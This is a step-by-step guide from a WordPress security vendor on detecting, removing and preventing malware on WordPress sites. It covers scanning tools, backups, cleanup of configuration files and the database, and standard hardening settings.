How to Remove Malware from WordPress (Complete 2026 Guide)

Written by Aegis Webs — WordPress security, malware recovery, and performance optimization.

WordPress Malware Removal Overview

WordPress malware refers to malicious code that has been inserted into your website without your permission or knowledge.

Once malware infects a WordPress website, it can manipulate how the site behaves, expose sensitive data, and damage the website’s search reputation. If not handled properly, the infection may also allow attackers to regain access even after partial cleanup.

Common consequences of WordPress malware include:

• Redirecting visitors to harmful or scam websites
• Injecting spam links into your existing content
• Creating hidden administrator or access accounts
• Corrupting or replacing XML sitemap files
• Generating fake backlinks to unknown domains
• Increasing server load through hidden scripts
• Exposing API credentials or authentication tokens
• Getting the website flagged or blacklisted by Google

This guide explains practical, real-world steps used to detect, remove, and prevent malware infections on WordPress websites.

What Is WordPress Malware?

WordPress malware is harmful code that attackers insert into website files or the database in order to exploit the site.

Malware usually enters a website through vulnerable plugins, outdated themes, weak passwords, compromised hosting environments, or infected administrator devices.

Once installed, the malicious code can perform various actions such as:

• Redirecting visitors to spam or phishing websites
• Injecting hidden spam links into existing pages
• Stealing user or customer data
• Creating hidden administrator users
• Generating unauthorized API tokens
• Creating unknown FTP accounts on the server
• Adding unauthorized users to your Google Search Console account
• Changing or corrupting XML sitemap files
• Generating backlinks to unknown or malicious domains (often visible inside Google Search Console)
• Modifying important website files without the site owner’s knowledge
• Sending spam emails through the hosting server
• Creating sudden spikes of fake or bot traffic
• Slowing down the website significantly
• Triggering Google security warnings or blacklisting

If any of these activities appear on your website, it should be treated as a potential compromise.

Signs Your Website Is Infected or hacked

Malware infections do not always produce obvious symptoms. Some operate silently while others cause visible changes to the website.

Common warning signs include:

• Unknown administrator users appearing inside WordPress
• Unauthorized FTP accounts appearing in the hosting panel
• New API tokens that you did not create
• Unknown users added to your Google Search Console access list
• Corrupted, replaced, or missing sitemap files
• Sudden appearance of spam backlinks in SEO tools or Search Console
• Pages redirecting visitors to malicious domains
• Suspicious PHP files appearing anywhere on the server
• Unexpected PHP files inside /wp-content/uploads/
• New folders appearing in the root directory without explanation
• Unknown directories inside wp-admin (for example a folder named maint)
• Repeated automated login attempts targeting login or admin URLs
• Backdoor PHP files reappearing even after deletion

If even one of these symptoms appears, the website should be treated as compromised and investigated immediately.

What To Do Immediately (Before Cleaning)

If you suspect malware, do not start deleting files immediately. The first step is to determine what level of access you still have to your website and server.

Understanding your available access will determine how the cleanup process should proceed.

Step 1: Check Your Access

Confirm whether you can still access the following systems:

• WordPress dashboard (wp-admin)
• Your hosting control panel such as cPanel, Plesk, or DirectAdmin
• File Manager inside the hosting panel
• FTP access to the server
• phpMyAdmin for database access

The cleanup method depends on which systems remain accessible.

If wp-admin is locked but the hosting panel is still accessible, manual cleanup is still possible.

If the hosting panel is also inaccessible, you should contact your hosting provider immediately to regain account access.

Step 2: Create a Complete Backup

Before deleting or modifying any files, create a complete backup of the website. Even if the website is infected, a backup allows you to restore files if something important is accidentally removed during cleanup.

If you can still access the WordPress dashboard:

Install a backup plugin such as:

• All-in-One WP Migration
• UpdraftPlus
• WPvivid
• Backuply

Create the following backups:

• Full website files backup
• Complete WordPress database backup

After creating the backup, download the backup files to your local computer.

If the WordPress dashboard is not accessible:

Create a backup directly from the hosting control panel.

• Download the entire root directory (usually public_html)
• Export the full database using phpMyAdmin
• Download the .htaccess file
• Download the wp-config.php file

Check Server-Level Backups

Many hosting providers maintain automated server backups that may allow you to restore the website to an earlier state.

Common backup systems include:

• JetBackup
• Backuply (server-side installations)
• Automatic restore points provided by the hosting provider

If a clean restore point exists from before the infection occurred, restoring the backup may be faster than performing a full manual cleanup.

However, confirm that the backup was created before the infection. Restoring an already infected backup will not solve the problem.

Do not skip the backup step.

Step 1 – Scan the Website for Malware

Use a Hosting-Level Scanner First

Server-level malware scanners inspect files across the entire hosting account, including areas outside the WordPress installation.

Common server scanning tools include:

• ImunifyAV / Imunify360
• ClamAV
• Linux Malware Detect (Maldet)
• ConfigServer eXploit Scanner (CXS)

Typical scanning process:

• Open your hosting control panel
• Navigate to Security or Malware Scanner
• Run a full account scan
• Record the file paths flagged by the scanner

Avoid deleting files immediately. First document the scan results so you know exactly which files were flagged.

Scan Using a WordPress Security Plugin (If wp-admin Is Accessible)

If you still have access to the WordPress dashboard, you can run an additional scan using a security plugin.

Use only one scanner at a time to avoid unnecessary server load.

Common scanning plugins include:

• Wordfence (use primarily for scanning; it can be heavy on shared hosting)
• Sucuri Security
• MalCare

Important notes about MalCare:

• The free version mainly detects malware
• It does not remove infections
• Detailed infected file paths may not always be displayed

Because of this, it is generally used as a detection tool unless the premium version is available.

Manual File Inspection

Automated scanners do not always detect every infection. Manual inspection of key directories is often necessary.

Check the following locations:

• /wp-content/uploads/ (this folder should normally not contain executable PHP files)
• The root directory for unknown or suspicious folders
• The wp-admin directory for unexpected subfolders (for example a folder named maint)
• Recently modified files
• The .htaccess file
• The wp-config.php file

Look for suspicious code patterns such as:

• eval()
• base64_decode()
• gzinflate()
• Obfuscated or unreadable code
• Long encoded strings

Step 2 – Remove Malicious Files Safely

Remove Backdoor Files

• Delete unknown PHP files that do not belong to WordPress
• Remove randomly named alphanumeric files
• Delete suspicious or fake plugin folders
• Remove newly created directories that you did not create

If you are unsure whether a file is legitimate, compare your installation with a clean WordPress installation.

Replace WordPress Core Files

Download a fresh copy of WordPress from the official website: wordpress.org

Extract the package locally.

Upload and replace the following directories and files:

• /wp-admin/
• /wp-includes/
• WordPress core files in the root directory

Do not overwrite:

• /wp-content/
• wp-config.php

Inspect wp-config.php Carefully

Open the wp-config.php file in your website root directory. This file contains critical configuration settings for WordPress, including database credentials and security keys.

Scroll to the bottom of the file. In a normal installation, the final lines should look like this:

/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';

Anything added after this line should be treated as suspicious and reviewed carefully.

Common indicators of malicious code include:

• Any code placed after the require_once line
• Functions such as eval()
• Encoded strings using base64_decode()
• Unknown include or require statements
• External domain calls that do not belong to WordPress

If you are unsure whether the file has been modified, compare it with the wp-config-sample.php file included in a clean WordPress installation.

Remove only the malicious or suspicious code. Do not remove database credentials, authentication keys, or other legitimate configuration settings.

Inspect .htaccess Carefully

The .htaccess file controls important server behavior such as URL rewriting and access rules. Malware often modifies this file to redirect visitors or hide malicious activity.

A normal WordPress .htaccess block typically looks like this:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

Warning signs inside the file include:

• Long encoded or obfuscated strings
• Redirect rules pointing to unknown domains
• Conditional redirects targeting search engines or bots

If you are unsure whether the file has been compromised:

• Create a backup copy of the current file
• Replace it with the default WordPress rewrite block
• Log in to the WordPress dashboard and save permalinks to regenerate rewrite rules

Step 3 – Clean Malware from the Database

Check the wp_users Table

Open the database using phpMyAdmin and review the wp_users table.

Remove any administrator accounts that you did not create. Attackers often add hidden admin users to regain access after a partial cleanup.

Inspect the wp_options Table

Next, examine the wp_options table for suspicious entries.

Look for:

• Suspicious or unfamiliar URLs
• Injected JavaScript or scripts
• Modified homepage or site URLs
• Unexpected cron jobs or scheduled tasks

Search the Entire Database

Many infections hide spam scripts or redirect code inside posts, widgets, or theme settings stored in the database.

Use the search function in phpMyAdmin to look for suspicious patterns such as:

<script>
iframe
base64
eval(

Also search for unknown or suspicious domains that do not belong to your website.

If injected code is found, remove it carefully while preserving legitimate content.

Verify and Restore XML Sitemaps

Malware sometimes corrupts sitemap files or replaces them with spam URLs.

Delete any suspicious or corrupted sitemap files located in the website root directory.

Then regenerate the sitemap using a trusted SEO plugin such as:

• Yoast SEO
• Rank Math
• All in One SEO
• SEOPress

After regenerating the sitemap, resubmit it inside Google Search Console and remove any unauthorized users that may have been added.

Protect or Disable XML-RPC

Visit:

yourdomain.com/xmlrpc.php

If XML-RPC is not needed, block it using .htaccess:

<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

Disable File Editing in Dashboard

Open wp-config.php and add the following line above:

/* That's all, stop editing! Happy publishing. */

Insert:

define('DISALLOW_FILE_EDIT', true);

Restrict PHP Execution in Uploads

Navigate to:

public_html/wp-content/uploads/

Create or edit a .htaccess file inside the uploads folder and add:

<Files *.php>
deny from all
</Files>

How to Prevent Future WordPress Malware Infections

After cleaning a compromised website, the next priority is preventing the infection from happening again. Most WordPress malware incidents occur because of outdated software, weak access control, or vulnerable plugins.

The following security practices significantly reduce the risk of future compromises.

• Keep WordPress core updated
  Always run the latest stable version of WordPress. Security patches are released regularly to fix vulnerabilities discovered in the platform.
• Keep plugins and themes updated
  Outdated plugins and themes are one of the most common entry points for attackers. Remove unused plugins and update active ones regularly.
• Avoid cracked plugins and unknown GPL sources
  Plugins downloaded from unofficial or untrusted GPL websites often contain hidden backdoors or injected malware.
• Limit administrator access
  Only trusted users should have administrator privileges. Remove unused accounts and reduce permissions where possible.
• Enable Two-Factor Authentication (2FA)
  Two-factor authentication adds an extra security layer to WordPress login and significantly reduces the risk of brute-force attacks.
• Protect or disable XML-RPC
  If your website does not require XML-RPC functionality, block access to xmlrpc.php to reduce automated login attacks.
• Rotate API keys and tokens after a compromise
  If malware infection exposed API credentials, regenerate and replace them immediately.
• Monitor server and access logs
  Review hosting logs periodically to detect suspicious activity such as repeated login attempts or unusual traffic spikes.
• Maintain regular off-site backups
  Frequent backups allow quick restoration if the website becomes compromised again.

Frequently Asked Questions (FAQ)

1. How can I tell if my WordPress website has been hacked?

Some infections are obvious, while others remain hidden until you investigate server files or search console reports.

Common warning signs include:

• Unknown administrator users appearing in WordPress
• Suspicious PHP files inside /wp-content/uploads/
• Visitors being redirected to spam or scam domains
• Spam backlinks appearing in Google Search Console
• Unexpected changes to .htaccess or wp-config.php
• Malware alerts from your hosting provider

If any of these symptoms appear without explanation, the website should be treated as potentially compromised.

2. Can WordPress malware be removed without using a plugin?

Yes. Malware can be removed manually by inspecting and cleaning the website files and database.

Manual cleanup usually involves:

• Replacing WordPress core files with a clean installation
• Removing suspicious or unknown PHP files
• Cleaning injected scripts from the database
• Repairing or replacing the .htaccess file
• Inspecting the wp-config.php file for malicious code

Security plugins are helpful for detection, but manual inspection is often necessary for complete removal.

3. Is restoring a backup better than cleaning the site manually?

If you have a confirmed clean backup created before the infection occurred, restoring that backup is often the fastest solution.

However, always verify the following:

• The backup was created before the infection
• All passwords are rotated after restoration
• The vulnerability that allowed the infection is fixed

Restoring an already infected backup will simply reintroduce the malware.

4. Why does malware return after I delete infected files?

Reinfection usually occurs because something was missed during the cleanup process.

Common causes include:

• A hidden backdoor file remaining on the server
• An infected plugin or theme still installed
• Weak passwords that were not changed
• Compromised FTP credentials
• A server-level vulnerability that was not addressed

After cleaning a compromised site, all access credentials should be rotated.

5. Is deleting suspicious PHP files enough to remove malware?

No. Malware rarely exists in a single location.

A proper cleanup process should also include:

• Replacing WordPress core files
• Inspecting the database for injected scripts
• Checking scheduled cron tasks
• Reviewing administrator accounts
• Inspecting the .htaccess configuration

Deleting one infected file without investigating the rest of the system may leave backdoors behind.

6. Should XML-RPC be disabled?

If your website does not rely on mobile apps, remote publishing tools, or external integrations that require XML-RPC, blocking access to xmlrpc.php can reduce the attack surface.

Blocking the file using .htaccess is usually sufficient to prevent automated abuse and brute-force attempts.

7. Does reinstalling WordPress remove malware?

Reinstalling WordPress replaces the core files, which can remove infections located inside the core system.

However, reinstalling WordPress does not:

• Clean infected plugins
• Clean infected themes
• Remove malicious database injections
• Remove backdoor scripts placed in the uploads directory

Core replacement should be treated as only one step in the cleanup process.

8. Does shared hosting increase the risk of malware?

Shared hosting itself is not inherently insecure. However, the risk increases if server security is poorly maintained.

Potential risks include:

• Other compromised accounts on the same server
• Weak file permission configurations
• Outdated PHP versions
• No active server-level malware scanning

Choose hosting providers that maintain updated security layers and server monitoring.

9. After cleaning malware, what should I change immediately?

After removing malware, rotate all credentials that could have been exposed during the compromise.

This includes:

• WordPress administrator passwords
• Hosting control panel passwords
• FTP or SFTP credentials
• Database passwords
• API keys and tokens
• Google Search Console access permissions

Security cleanup is incomplete until access credentials have been updated.

10. How often should WordPress websites be backed up?

At minimum, backups should be created:

• Before installing or updating plugins and themes
• Before major website changes

Recommended backup frequency:

• Daily backups for active websites
• Weekly backups for low-traffic or static websites

Backups should always be stored off-server to ensure they remain available if the hosting account is compromised.